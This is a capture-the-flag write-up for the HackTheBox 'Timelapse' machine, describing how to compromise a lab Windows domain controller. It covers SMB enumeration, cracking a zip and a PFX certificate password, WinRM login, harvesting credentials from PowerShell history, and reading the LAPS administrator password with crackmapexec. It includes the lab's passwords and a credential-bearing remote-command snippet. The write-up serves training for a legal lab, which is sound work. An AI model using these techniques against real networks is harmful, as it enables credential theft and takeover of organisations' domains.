# HackTheBox-Timelapse ## NMAP ```bash PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-27 03:07:25Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3269/tcp open tcpwrapped 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | ssl-cert: Subject: commonName=dc01.timelapse.htb | Issuer: commonName=dc01.timelapse.htb | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-10-25T14:05:29 | Not valid after: 2022-10-25T14:25:29 | MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3 |_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652 |_ssl-date: 2022-03-27T03:10:27+00:00; +7h59m59s from scanner time. | tls-alpn: |_ http/1.1 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 64463/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cg i-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=3/27%Time=623F6471%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-03-27T03:09:54 |_ start_date: N/A ``` From the nmap results we have port 88 which is kerberos and whenever we see this service running on a windows machine it means that's a `Domain Controller`so we are looking at `Active Directory` here and we also have the domain name as well which is `dc01.timelapse.htb` so let's add this in our `/etc/hosts` file

## PORT 389 (LDAP) Checking for null authentication on LDAP as it can sometimes give us the usernames but it failed

## PORT 139/445 (SMB) Having smb service running, we can check what shares this machine has using `smbclient`

Checking the `Shares` we have two folders here

In `Dev` folder we have `winrm_backup.zip` so let's download that

And in `HelpDesk` we have 3 document files regarding `LAPS` and an installer file for LAPS

LAPS here is Local Administrator Password Solution which randomizes administrator's password in the ad domain so that the administrator account's password isn't the same across the domain The document files were related to installing LAPS on the DC so it was just about the documentation When unzipping the archive from smb share it was asking for a password

So using `fcrackzip` we can brutefroce the password for this zip archive

```bash fcrackzip -u -D -p /opt/SecLists/Passwords/rockyou.txt ./winrm_backup.zip ``` Here the parameters are: * -u, It will try to decompress the first file by calling unzip with the guessed password * -D, This will use dictionary mode, fcrackzip will read passwords from a file which must contain one password per line * -p, this is for specifying either a string or the wordlist

## Foothold After unzipping the archive we'll get a pfx (`legacyy_dev_auth.pfx`) file and it's a SSL certificate that contains both public and private keys which can be used for authentication that is protected by a password I tried to read the certifiate with `openssl` and provided the same password that we got for the archive but it failed

We can try to crack the password hash for this pfx file by running `pfx2john` to get the hash then running `johntheripper` to crack it

And now we should be able to read the certificate

Reading the certificate we can see a user name `Legacyy`, this can be verified if it's actually a username on the machine by running `kebrute` to see if the user exists

Since port 5986 is open which is WinRM over SSL and we need to use a certificate to authenticate to winrm, `evill-winrm` doesn't have the option to use pfx certificate so I though maybe we need to extract the public and private key certificate from pfx as it does have option to specify them

And doing this, it worked

In `C:\Users` we see user `svc_deploy` and `TRX`

## Privilege Escalation (svc_deploy) As this is a AD box, we can try running bloodhound to enumerate the domain for potential paths for privilege escalation and other misconfigurations in the domain

But after uploading it and importing, it was blocked by AV, I tried it through `IEX` as well but it still didn't worked

Downloading sharphound.exe from here https://github.com/BloodHoundAD/SharpHound and running it worked

But when I uploaded the archive on bloodhound GUI it wasn't able to parse the files, so moving on I tried looking into the powershell history file and found the credentials for svc_deploy user ```powershell more .\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ```

So using the same commands for making a PSCredential object we can execute commands as svc_deploy

Checking in which groups this user belongs to and, this is a member of LAPS_Reader group

## Privilege Escalation (Administrator) I tried looking into ways to read LAPS password and since we can't import scripts I tried running sharplaps.exe but it was caught by AV https://github.com/swisskyrepo/SharpLAPS/

So then I went through this article explaining how we can read LAPS password and it showed it through `crackmapexec` https://www.hackingarticles.in/credential-dumpinglaps/

One thing to note that crackmapexec requires `lsassy` a python library in order to use cme's modules which wasn't on my distro so I had to install it

And after this the module for LASP worked and we got the password ```powershell cme ldap 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps ```

Alternatively we can get the clear text password through `AD-Module` which already comes installed with LAPS, we can check if it's available through `Get-Module -Name ActiveDirectory -ListAvailable` and then import it with `Import-Module -Name ActiveDirectory`

I came across this post in configuring LAPS https://adsecurity.org/?p=3164 So checking in which attribute we can find the clear text LAPS password

```bash Get-ADComputer -Identity "dc01" -Properties "ms-mcs-AdmPwd" ```

Being an administrator on domain controller we can then dump hashes from NTDS.dit file

## References - https://www.varonis.com/blog/microsoft-laps - https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file - https://github.com/BloodHoundAD/SharpHound - https://www.hackingarticles.in/credential-dumpinglaps/ ``` archive : supremelegacy pfx : thuglegacy `--CollectionMethod All --Domain timelapse.htb ` $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} ```